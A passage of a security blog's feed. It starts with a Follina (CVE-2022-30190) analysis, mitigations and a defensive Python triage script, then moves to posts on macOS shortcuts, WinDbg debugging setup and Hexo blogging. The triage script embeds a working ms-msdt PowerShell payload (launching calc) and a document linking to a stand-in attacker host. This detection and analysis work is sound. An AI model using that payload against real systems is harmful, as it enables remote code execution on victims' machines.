)</code> carries a PowerShell subexpression, which is evaluated when the pack's script processes the parameter. The base64 string <code>YwBhAGwAYwA=</code> is UTF-16LE for <code>calc</code>; the path-traversal suffix ending in <code>mpsigstub.exe</code> makes the parameter resolve to an existing system file</li></ul><p>In short, that part of the URI names what the troubleshooter should run; while the pack works through it, the PowerShell embedded in the payload is evaluated and executed.</p><h2 id="修复"><a href="#修复" class="headerlink" title="Mitigation"></a>Mitigation</h2><p>Disable the <code>MSDT URL</code> protocol:</p><blockquote><ol><li><p>Run a Command Prompt as administrator</p></li><li><p>Back up the registry key first: reg export HKEY_CLASSES_ROOT\ms-msdt filename</p></li><li><p>Then run: reg delete HKEY_CLASSES_ROOT\ms-msdt /f</p></li></ol></blockquote><p>To undo the workaround, run <code>reg import filename</code> from an administrator cmd.</p><blockquote><p>The Office versions affected by this RCE are not easy to enumerate and there is no official patch yet, so the vulnerability is likely to be exploited further. Given its wide impact and high severity, Antiy CERT recommends:</p><ol><li><p>Be careful downloading or opening documents of unknown origin or suspicious content;</p></li><li><p>Turn off the file preview pane in Explorer;</p></li><li><p>Update endpoint antivirus software and signatures;</p></li><li><p>Disable ms-msdt and remove the corresponding .rtf file-type association.</p></li></ol></blockquote><p>The advisory above predates the fix: Microsoft shipped patches for CVE-2022-30190 in the June 14, 2022 cumulative updates. Installing them is the real fix; the ms-msdt registry workaround can be reverted once they are in place.</p><p><a href="https://xz.aliyun.com/t/11416">Follina Microsoft Office RCE with MS-MSDT Protocol</a></p><p><a href="https://www.antiy.cn/research/notice&report/research_report/20220531.html">Microsoft Office remote code execution (CVE-2022-30190) risk notice</a></p><p>WeChat account 红队蓝军: analysis, reproduction and mitigation of the Windows Support Diagnostic Tool (MSDT) remote code execution (CVE-2022-30190)</p><p><img src="https://img-blog.csdnimg.cn/img_convert/d717a424deb896a4ca97a7f1f83da1f8.png"></p>]]></content>
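The following is an added example, not part of the article above or of follina.py. It shows the defender's side of the two artifacts the PoC analysis describes: the external relationship that the generator writes into document.xml.rels, and the ms-msdt: URI that exploit.html navigates to. It builds a minimal constructed .docx in memory (the attacker host attacker.invalid, the relationship id and the trailing "!" are illustrative), embeds a constructed HTML page in the shape of the PoC's exploit.html with the article's calc payload, and runs both through a small triage routine that also decodes the base64 UTF-16LE command.

```python
"""Added example: triage of Follina-style artifacts. Sample .docx and HTML are constructed."""
import base64
import io
import re
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import unquote

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
SUSPECT_REL = ("oleObject", "attachedTemplate", "frame")      # types used to pull remote content
MSDT_URI = re.compile(r"ms-msdt:[^\n<]*", re.IGNORECASE)
# the payload wraps its base64 argument as ...'+[char]34+'<b64>'+[char]34+'...
B64_ARG = re.compile(r"\[char\]34\+'([A-Za-z0-9+/=]+)'\+\[char\]34")


def build_sample_docx(external_target=None) -> bytes:
    """Constructed minimal .docx. With external_target set, document.xml.rels carries the
    kind of external oleObject relationship the PoC template writes (hypothetical rId)."""
    rel = ""
    if external_target:
        rel = (f'<Relationship Id="rId1337" Type="{OOXML_REL}/oleObject" '
               f'Target="{external_target}" TargetMode="External"/>')
    rels = f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{RELS_NS}">{rel}</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def suspicious_external_targets(docx_bytes: bytes) -> list:
    """(relationship type, target) for every External oleObject/attachedTemplate/frame
    relationship whose target is fetched over http(s) or invokes ms-msdt directly."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(z.read(name)).iter(f"{{{RELS_NS}}}Relationship"):
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if (rel.get("TargetMode", "") == "External" and kind in SUSPECT_REL
                        and target.lower().startswith(("http:", "https:", "ms-msdt:"))):
                    hits.append((kind, target))
    return hits


def msdt_uris(html: str) -> list:
    """ms-msdt: URIs found in a fetched HTML page, percent-decoded and unquoted."""
    return [unquote(m).rstrip('";\\ ') for m in MSDT_URI.findall(html)]


def is_follina_like(uri: str) -> bool:
    """Heuristic from the payload in the article: PCWDiagnostic pack plus a PowerShell
    subexpression $( ) inside the IT_BrowseForFile parameter."""
    low = uri.lower()
    return "pcwdiagnostic" in low and "it_browseforfile=" in low and "$(" in uri


def decode_encoded_command(uri: str) -> str:
    """Recover the command hidden in the FromBase64String(...) argument (UTF-16LE)."""
    m = B64_ARG.search(uri)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else ""


def triage(docx_bytes: bytes, fetched_html: str) -> dict:
    """Combine both checks the way an analyst would after pulling the remote HTML."""
    uris = [u for u in msdt_uris(fetched_html) if is_follina_like(u)]
    return {
        "external_targets": suspicious_external_targets(docx_bytes),
        "msdt_uris": uris,
        "command": decode_encoded_command(uris[0]) if uris else "",
    }


# Constructed sample in the shape of the PoC's exploit.html, carrying the article's calc payload.
SAMPLE_HTML = """<!doctype html><html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+')'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"";
</script></body></html>"""

if __name__ == "__main__":
    sample = build_sample_docx("http://attacker.invalid/exploit.html!")
    print(triage(sample, SAMPLE_HTML))
```

The relationship check deliberately ignores ordinary external hyperlinks, which are normal in documents; oleObject, attachedTemplate and frame targets that point at a web server are the ones worth a closer look.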
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/f0d15dfa21d24dc0a4b7475c382a9706.png"></p>
<h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></summary>
<category term="Phishing" scheme="https://oceansec.github.io/categories/%E9%92%93%E9%B1%BC/"/>
<category term="Windows" scheme="https://oceansec.github.io/tags/Windows/"/>
</entry>
<entry>
<title>Mechrevo Z2 Hackintosh conversion, part 3: macOS keyboard shortcuts and Windows keyboard adaptation</title>
<link href="https://oceansec.github.io/2023/12/05/macOS%E9%94%AE%E7%9B%98%E5%BF%AB%E6%8D%B7%E9%94%AE&Win%E9%94%AE%E7%9B%98%E9%80%82%E9%85%8D/"/>
<id>https://oceansec.github.io/2023/12/05/macOS%E9%94%AE%E7%9B%98%E5%BF%AB%E6%8D%B7%E9%94%AE&Win%E9%94%AE%E7%9B%98%E9%80%82%E9%85%8D/</id>
<published>2023-12-05T02:59:04.848Z</published>
<updated>2023-02-20T10:55:21.700Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/9e2650d2eea947c39aeca1dbc790e72b.png" alt="image"></p><h1 id="macOS键盘快捷键-amp-Win键盘适配"><a href="#macOS键盘快捷键-amp-Win键盘适配" class="headerlink" title="macOS keyboard shortcuts and Windows keyboard adaptation"></a>macOS keyboard shortcuts and Windows keyboard adaptation</h1><h2 id="键盘区别"><a href="#键盘区别" class="headerlink" title="Keyboard differences"></a>Keyboard differences</h2><p>Below is the Apple Magic Keyboard without Touch ID, 699 RMB on the Apple store; as a broke student I really cannot afford it.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c22f74bc478a76bda1b4a64997bca02b.png" alt="Screenshot 2023-02-15 15.08.36"></p><p>And this is the mechanical keyboard I actually use, an ikbc W200 87-key.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/bc11205ab71eb2df4fdd3a20344f54ea.png" alt="Screenshot 2023-02-15 15.20.21"></p><p>The main difference in layout is the Win/Command key. Most macOS shortcuts are Command + another key, which on a Windows keyboard means Win + that key; Apple's Option key corresponds to Alt on a Windows keyboard.</p><h2 id="快捷键"><a href="#快捷键" class="headerlink" title="Shortcuts"></a>Shortcuts</h2><p>Apple documents them here: <a href="https://support.apple.com/zh-cn/HT201236">link</a></p><p>Some useful macOS shortcuts; many are the same as on Windows:</p><ol><li>Command + C copies, Command + V pastes. Note that macOS has no cut for files: Command + X only cuts text</li><li>To move a file, Command + C it first, then Option + Command + V at the destination</li><li>Command + Space shows or hides the Spotlight search bar; if you have used uTools on Windows you know the idea, and macOS has similar tools such as Alfred and HapiGo</li><li>Command + Shift + 3/4/5 take a full-screen / region / window screenshot respectively; hold Control as well to put the screenshot on the clipboard instead of saving it (quite a stretch for the fingers)</li><li>Command + Q quits the application; Option + Command + Esc force-quits</li><li>Command + M minimises the current window to the Dock; Command + H hides the application</li><li>In macOS, pressing Enter on a selected file renames it instead of opening it</li><li>Command + Shift + N creates a new folder</li><li>Command + D duplicates (on Windows Ctrl + D deletes)</li><li>Command + Delete deletes the file</li><li>Command + Up Arrow opens the folder containing the current folder<br>Command + Down Arrow opens the selected item</li><li>When editing text, Command + Left Arrow jumps to the start of the line and Command + Right Arrow to the end</li><li>Command + F7/F8: volume down/up</li><li>Scroll Lock lowers the screen brightness, Pause raises it</li><li>Caps Lock switches between Chinese and English input; hold Shift for uppercase</li><li>With a file, picture, video or similar selected, press Space for Quick Look, the "one-finger" preview</li></ol><p><strong>Cursor movement shortcuts in the Mac terminal</strong></p><ul><li>Move the cursor to the start of the line: Control + A</li><li>Move the cursor to the end of the line: Control + E</li><li>Clear the screen: Control + L</li><li>Search previously used commands: Control + R</li><li>Clear the current line: Control + U</li></ul><h2 id="键盘设置"><a href="#键盘设置" class="headerlink" title="Keyboard settings"></a>Keyboard settings</h2><p>On a Mac keyboard the Command key sits directly left of the space bar, while Windows keyboards put an Alt key in between. If that is uncomfortable you can remap it in macOS:</p><p>System Preferences - Keyboard - Change Keyboard Type</p><p><img src="https://img-blog.csdnimg.cn/img_convert/8d5dc4701ce18e050bb5b2bf6e7698f6.png" alt="Screenshot 2023-02-15 17.54.58"></p><h2 id="鼠标设置"><a href="#鼠标设置" class="headerlink" title="Mouse settings"></a>Mouse settings</h2><p>The mouse wheel direction is also the reverse of Windows: macOS treats the wheel like the trackpad, simulating a finger dragging the content, and the Magic Mouse is touch-based too. If you do not use a trackpad you can change this:</p><p>System Preferences - Mouse - untick Natural scrolling</p><p><img src="https://img-blog.csdnimg.cn/img_convert/7fcebca2a5cf61d8bffeadd54627e87a.png" alt="Screenshot 2023-02-15 17.58.32"></p><p>That said, the Mac trackpad really is excellent. On Xianyu a second-hand Magic Mouse 2 goes for around 200 RMB, a first-generation Magic Trackpad around 250 and a second-generation around 400, all pricey, so I am sticking with my own keyboard and mouse.</p><p>Because I use the terminal constantly, I added it to Finder's Services so that right-clicking in a folder opens a terminal there, which is very convenient.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/122dc510f8eb792be8029f260e9489a7.png" alt="image-20230215180725792"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/ea467c86b1f925b4bbf8e10866287323.png" alt="Screenshot 2023-02-15 18.04.58"><br><img src="https://img-blog.csdnimg.cn/a2f8e34dc109445eb05ee5f1126aa780.png" alt="image"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/9e2650d2eea947c39aeca1dbc790e72b.png" alt="image"></p>
<h1 id="macOS键盘快捷键-amp-Win键盘适配"><a href=</summary>
<category term="Hackintosh" scheme="https://oceansec.github.io/categories/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
<category term="Hackintosh" scheme="https://oceansec.github.io/tags/%E9%BB%91%E8%8B%B9%E6%9E%9C/"/>
</entry>
<entry>
<title>Setting up a two-machine WinDbg VM debugging environment on macOS</title>
<link href="https://oceansec.github.io/2023/12/05/macos%20%E7%8E%AF%E5%A2%83%E4%B8%8B%E6%90%AD%E5%BB%BA%20windbg%20%E8%99%9A%E6%8B%9F%E6%9C%BA%E5%8F%8C%E6%9C%BA%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83/"/>
<id>https://oceansec.github.io/2023/12/05/macos%20%E7%8E%AF%E5%A2%83%E4%B8%8B%E6%90%AD%E5%BB%BA%20windbg%20%E8%99%9A%E6%8B%9F%E6%9C%BA%E5%8F%8C%E6%9C%BA%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83/</id>
<published>2023-12-05T02:59:04.846Z</published>
<updated>2022-09-19T09:31:09.710Z</updated>
<content type="html"><![CDATA[<p>This time I set up a two-machine WinDbg VM debugging environment on macOS. It differs slightly from doing it on Windows; for two-machine VM debugging on Windows see the previous post.</p><p>Lab setup</p><ul><li>Physical machine: MacBook + VMware Fusion Pro 12.1.0</li><li>Debugger machine: Windows 10 x64 + WinDbg Preview </li><li>Target machine (the one being debugged): Windows 7 x64</li></ul><p>Setup</p><ol><li><p>Configure the VM serial ports. First locate the virtual machine bundle.</p><p>Right-click the machine and choose Open in Finder (in my screenshot I had Command held down, so it shows "Open Latest Log File" instead)</p><p><img src="https://s2.loli.net/2022/09/19/gtof97WCIwBak3H.png" alt="Screenshot 2022-09-19 11.37.35"></p><p>Find the debugger VM and the target VM, right-click, Show Package Contents, then open the <code>machine-name.vmx</code> file of each.</p><p><strong>Debugger machine</strong></p><p>Remove the existing lines containing "serial0" and replace them with:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">serial0.present = "TRUE"</span><br><span class="line">serial0.fileType = "pipe"</span><br><span class="line">serial0.fileName = "/Users/{name}/com1"</span><br><span class="line">serial0.yieldOnMsrRead = "TRUE"</span><br><span class="line">serial0.tryNoRxLoss = "FALSE"</span><br><span class="line">serial0.pipe.endPoint = "client"</span><br></pre></td></tr></table></figure><p><strong>Target machine</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">serial0.fileName = "/Users/{name}/com1"</span><br><span class="line">serial0.present = "TRUE"</span><br><span class="line">serial0.fileType = "pipe"</span><br><span class="line">serial0.yieldOnMsrRead = "TRUE"</span><br><span class="line">serial0.startConnected = "TRUE"</span><br></pre></td></tr></table></figure><p>Note: replace {name} with your own user name, so that both VMs point at the same pipe path. A VM must be shut down or suspended before its .vmx file can be edited.</p></li><li><p>Enable the serial debug port in the <strong>target machine</strong>: open cmd as administrator and run</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">bcdedit /enum ACTIVE</span><br><span class="line">bcdedit /dbgsettings serial baudrate:115200 debugport:1</span><br><span class="line">bcdedit /copy {current} /d "Windows Debug Entry"</span><br><span class="line">bcdedit /displayorder {current} {id-printed-by-the-copy-command}</span><br><span class="line">bcdedit /debug {id-printed-by-the-copy-command} ON</span><br><span class="line">bcdedit -set TESTSIGNING on</span><br><span class="line">bcdedit /dbgsettings</span><br></pre></td></tr></table></figure><p><code>/copy</code> prints the GUID of the new entry; that GUID goes into the <code>/displayorder</code> and <code>/debug</code> commands, and the final <code>/dbgsettings</code> shows the resulting debugger settings.</p><p><img src="https://s2.loli.net/2022/09/19/Aj1Ecg9BUGki6Wz.png" alt="Screenshot 2022-09-19 12.21.32"></p><p><img src="https://s2.loli.net/2022/09/19/vEcyO8SZbj4NwMm.png" alt="Screenshot 2022-09-19 12.22.58"></p><p>After the commands complete, reboot; a new boot entry appearing at startup means it worked.</p><p><img src="https://s2.loli.net/2022/09/19/qhSVdgQr1Uub7ik.png" alt="Screenshot 2022-09-19 16.50.36"></p></li><li><p><strong>Debugger machine settings</strong></p><p>Computer Management -> Device Manager -> Ports -> Communications Port -> Port Settings</p><p>Set bits per second to 115200</p><p><img src="https://s2.loli.net/2022/09/19/6JgjO4nqAdCHe2k.png" alt="Screenshot 2022-09-19 12.27.19"></p></li><li><p>Open WinDbg Preview</p><p>Attach to kernel</p><p><img src="https://s2.loli.net/2022/09/19/Ebj38mir4uMdft7.png" alt="Screenshot 2022-09-19 12.29.59"></p><p>At this point the target machine should be sitting at the boot menu; choose Windows Debug Entry</p><p><img src="https://s2.loli.net/2022/09/19/ydc5WoN3LGtT6hO.png" alt="Screenshot 2022-09-19 16.52.26"></p></li></ol><p>After that you can debug away.</p>]]></content>
<summary type="html"><p>This time I set up a two-machine WinDbg VM debugging environment on macOS. It differs slightly from doing it on Windows; for two-machine VM debugging on Windows see the previous post.</p>
<p>Lab setup</p>
<ul>
<li>Physical machine: MacBook + VMware Fusion Pro 12.1.0<</summary>
<category term="Internal network" scheme="https://oceansec.github.io/categories/%E5%86%85%E7%BD%91/"/>
<category term="Environment setup,Debugging" scheme="https://oceansec.github.io/tags/%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA-%E8%B0%83%E8%AF%95/"/>
</entry>
<entry>
<title>Building a Hexo blog and deploying it to GitHub</title>
<link href="https://oceansec.github.io/2023/12/05/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E9%83%A8%E7%BD%B2GitHub/"/>
<id>https://oceansec.github.io/2023/12/05/hexo%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E9%83%A8%E7%BD%B2GitHub/</id>
<published>2023-12-05T02:59:04.844Z</published>
<updated>2023-02-15T06:50:25.690Z</updated>
<content type="html"><![CDATA[<p><img src="https://img-blog.csdnimg.cn/85078d1b776d429eba18a5bc29b178a9.png" alt="在这里插入图片描述"></p><h1 id="Hexo博客"><a href="#Hexo博客" class="headerlink" title="Hexo博客"></a>Hexo Blog</h1><p>Hexo is a lightweight static blog generator that renders Markdown files. The static files are generated locally and can then be deployed to GitHub, so no domain or server of your own is needed. I actually switched to Hexo quite a while ago: the old blog lived on CSDN at <a href="https://oceansec.blog.csdn.net/">oceansec.blog.csdn.net</a>, the new one is on GitHub at <a href="https://oceansec.github.io/">oceansec.github.io</a>, but I never got around to writing up the process. This post walks through how to set up your own Hexo blog.</p><p>The official Hexo documentation is <a href="https://hexo.io/zh-cn/docs/">here</a>.</p><h2 id="1-安装NodeJS"><a href="#1-安装NodeJS" class="headerlink" title="1.安装NodeJS"></a>1. Install Node.js</h2><p>The first thing to know is that Hexo runs on Node.js, so Node.js has to be installed. On macOS, once Homebrew is installed, Node.js can be installed directly with:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">brew install node</span><br></pre></td></tr></table></figure><p>After installation, run <code>node -v</code> to print the installed version and confirm the install succeeded.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/44fdcc1e6f163ff5b8d82ba16a1efd2f.png" alt="截屏2023-02-15 10.40.52"></p><p>If Homebrew is not installed yet, it can be installed with the following command:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"</span><br></pre></td></tr></table></figure><h2 id="2-安装git"><a href="#2-安装git" class="headerlink" title="2.安装git"></a>2. Install git</h2><p>macOS ships with git. On Windows, download the installer from the official site and run it. Use <code>git --version</code> to check that the install succeeded; on Windows you may also need to add git to the PATH environment variable.</p><p>On macOS, git can also be installed and managed through Homebrew:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">brew install git</span><br></pre></td></tr></table></figure><h2 id="3-安装Hexo"><a href="#3-安装Hexo" class="headerlink" title="3.安装Hexo"></a>3. Install Hexo</h2><p>Pick a folder to serve as the blog directory, open it in a terminal, and install Hexo with:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">npm install -g hexo-cli</span><br></pre></td></tr></table></figure><p>After installation, initialize the blog; this automatically downloads the starter project from GitHub:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hexo init</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/img_convert/7778750f6f5b6fec7017879c479877ad.png" alt="截屏2023-02-15 10.44.27"></p><p>Then run <code>hexo g</code> to generate the static pages and <code>hexo s</code> to start a local server for testing.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/323eecb783a9453d6cff52f13f1cdee5.png" alt="截屏2023-02-15 10.49.56"></p><p><img src="https://img-blog.csdnimg.cn/img_convert/73ec5d08b18a41561e9da5badbf110e0.png" alt="截屏2023-02-15 10.51.09"></p><p>At this point the blog is up and running locally; the next step is to pick a theme to your liking.</p><h2 id="4-替换主题"><a href="#4-替换主题" class="headerlink" title="4.替换主题"></a>4. Switch the theme</h2><p>Themes are easy to find online, especially on GitHub. Taking the pure theme that I use as an example: first download the theme, then extract it into the themes directory under the Hexo directory.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/1064096b0a620f1bae4cef9f91e81334.png" alt="截屏2023-02-15 11.34.19"></p><p>Then edit the configuration to enable the theme. Hexo has two main configuration files, both named _config.yml: one in the blog root directory, which holds the configuration of Hexo itself, and one in the theme's root directory, which holds the theme-specific options.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/26206c72f1315ceab6d9a5a6a141ed20.png" alt="截屏2023-02-15 11.36.03"></p><ol><li><p>Open <code>_config.yml</code> and change the following entries (YAML comments start with <code>#</code>):</p><figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line">language: zh-CN # set the theme language to Chinese; leave unchanged for the English version</span><br><span class="line">theme: hexo-theme-pure # switch the Hexo theme</span><br></pre></td></tr></table></figure></li><li><p>Open a terminal in the Hexo directory and run the following to clear the old cache files and render the new theme:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hexo clean && hexo s</span><br></pre></td></tr></table></figure><p>The screenshot below shows the result after the new theme is enabled.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/5a0ecd41236626746113484e737dd267.png" alt="截屏2023-02-15 11.40.38"></p></li></ol><h2 id="5-配置主题"><a href="#5-配置主题" class="headerlink" title="5.配置主题"></a>5. Configure the theme</h2><ol><li>Copy everything under <code> /theme/_source/</code> in the theme directory into the <code>source</code> folder in the blog root.</li><li>Fill in your personal information: <code>_config.yml</code> in the theme directory is the theme's configuration file; follow the comments in it.</li></ol><p><img src="https://img-blog.csdnimg.cn/img_convert/bb4da8bbfeafbac9070f5cb4567b3b8f.png" alt="截屏2023-02-15 12.03.14"></p><h2 id="6-放入文章"><a href="#6-放入文章" class="headerlink" title="6.放入文章"></a>6. Add posts</h2><p>Posts are Markdown files; simply place them in the <code>source/_posts/</code> directory.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/37824531d748a75c3a6ba540be716139.png" alt="截屏2023-02-15 12.05.37"></p><p>Because Hexo is a static site, after every change you need to clear the old cache and regenerate:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hexo clean</span><br><span class="line">hexo g</span><br></pre></td></tr></table></figure><p>With that the blog is finished; all that remains is uploading it to GitHub.</p><h2 id="7-部署至GitHub"><a href="#7-部署至GitHub" class="headerlink" title="7.部署至GitHub"></a>7. Deploy to GitHub</h2><p>So far the blog only runs locally; next it needs to be deployed to GitHub Pages.</p><blockquote><p>GitHub Pages is a web hosting service provided by GitHub, launched in 2008. It can host static sites, including blogs, project documentation and even whole books.</p></blockquote><p>First you obviously need a GitHub account; then create a new repository.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/c187a6929c1e369bd6038436e8e1ea6e.png" alt="截屏2023-02-15 13.14.52"></p><p>The repository name must match your username, because it determines the domain: the GitHub Pages domain is username.github.io.</p><p><img src="https://img-blog.csdnimg.cn/img_convert/e8e570c2c1518735275d22b7e1856362.png" alt="截屏2023-02-15 13.17.25"></p><p>Click Create to create the repository. To upload the static pages to GitHub, you then need to edit the configuration file in the Hexo directory (not the theme's configuration file):</p><figure class="highlight yaml"><table><tr><td class="code"><pre><span class="line">deploy:</span><br><span class="line">  type: git</span><br><span class="line">  repo: # the URL of your GitHub repository, e.g. git@github.com:username/username.github.io.git</span><br><span class="line">  branch: master</span><br></pre></td></tr></table></figure><p>This is not the only way to configure deployment, but it is the simplest. Afterwards, the <code>hexo d</code> command uploads the pages to GitHub.</p><h2 id="8-配置ssh密钥"><a href="#8-配置ssh密钥" class="headerlink" title="8.配置ssh密钥"></a>8. Configure an SSH key</h2><p>With the configuration so far, every <code>hexo d</code> deployment prompts for your GitHub username and password. GitHub provides a way around this: connect with an SSH key.</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">ssh-keygen -t rsa</span><br><span class="line">cat ~/.ssh/id_rsa.pub</span><br></pre></td></tr></table></figure><p><strong>Adding the SSH public key on GitHub</strong></p><p>Option 1: add the public key in your personal profile</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Your profile -> SSH and GPG keys -> New SSH key -> paste the generated public key -></span><br></pre></td></tr></table></figure><p>Option 2: add it in the repository settings</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Settings -> Deploy keys -> Add Deploy key -> paste the public key -> tick Allow write access -> Add new</span><br></pre></td></tr></table></figure><p>Once that is set up, test the connection with:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">ssh -T git@github.com</span><br></pre></td></tr></table></figure><p>Successful authentication means the configuration is correct. Run <code>hexo d</code> again and the whole blog is built and deployed to GitHub, reachable at username.github.io. If deployment still prompts for a username and password, the configuration file is wrong; re-check the deploy configuration from the previous step.</p><p><img src="https://img-blog.csdnimg.cn/15d8c95769a243dfa0dc576b62174266.png" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><p><img src="https://img-blog.csdnimg.cn/85078d1b776d429eba18a5bc29b178a9.png" alt="在这里插入图片描述"></p>
<h1 id="Hexo博客"><a href="#Hexo博客" class=</summary>
<category term="博客搭建" scheme="https://oceansec.github.io/categories/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/"/>
<category term="博客搭建" scheme="https://oceansec.github.io/tags/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/"/>
</entry>
<entry>
<title>2022 CISCN Innovation Capability Practice Contest Preliminary Round WP</title>
<link href="https://oceansec.github.io/2023/12/05/2022%20CISCN%20%E5%88%9B%E6%96%B0%E8%83%BD%E5%8A%9B%E5%AE%9E%E8%B7%B5%E8%B5%9B%E5%88%9D%E8%B5%9BWP/"/>
<id>https://oceansec.github.io/2023/12/05/2022%20CISCN%20%E5%88%9B%E6%96%B0%E8%83%BD%E5%8A%9B%E5%AE%9E%E8%B7%B5%E8%B5%9B%E5%88%9D%E8%B5%9BWP/</id>
<published>2023-12-05T02:59:04.842Z</published>
<updated>2022-08-13T12:37:33.630Z</updated>
<content type="html"><![CDATA[<blockquote><p>WP来自齐鲁师范学院网络安全社团<br><img src="https://img-blog.csdnimg.cn/68def0711ab44a01be039f449062fe4b.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAT2NlYW46KQ==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="请添加图片描述"></p></blockquote><h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h2 id="ez-usb"><a href="#ez-usb" class="headerlink" title="ez_usb"></a>ez_usb</h2><p><img src="https://img-blog.csdnimg.cn/img_convert/0ad1b368bd3c43be93222e5645548c2b.gif" alt="图片"></p><p>文件-导出特定分组</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span 
class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span 